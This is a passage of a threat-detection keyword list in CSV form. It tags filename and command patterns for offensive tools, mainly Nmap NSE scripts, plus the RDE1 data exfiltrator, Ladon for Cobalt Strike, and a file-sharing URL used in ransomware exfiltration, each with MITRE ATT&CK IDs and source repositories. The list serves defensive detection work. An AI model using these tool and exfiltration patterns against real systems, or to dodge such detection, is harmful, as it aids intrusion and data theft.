Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-jsonp-detection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-lexmark-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,0,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -* http-lfi.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* http-litespeed-sourcecode-download.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* http-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-majordomo2-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-malware-host.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-mcmp.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-method-tamper.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-mobileversion-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-nikto-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* http-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-open-proxy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-open-redirect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-passwd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-phpmyadmin-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-phpself-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-php-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-proxy-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-put.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-put-server.py*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* http-qnap-nas-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-referer-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-rfi-spider.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-robots.txt.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-robtex-reverse-ip.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-robtex-shared-ns.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* https://www.sendspace.com/file/*,greyware_tool_keyword,sendspace.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -* http-sap-netweaver-leak.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-security-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-server-header.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-shellshock.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-sitemap-generator.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-slowloris.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-slowloris-check.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* HTTPSniffer *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* 
http-spider-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* http-sql-injection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* https-redirect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-stored-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-svn-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-svn-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-tenda-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* http-title.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-tplink-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-trace.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-traceroute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-trane-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-unsafe-output-escaping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-useragent-tester.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-userdir-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vhosts.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-virustotal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vlcstreamer-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vmware-path-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2006-3392.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2009-3960.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2010-0738.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2010-2861.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2011-3192.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2011-3368.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
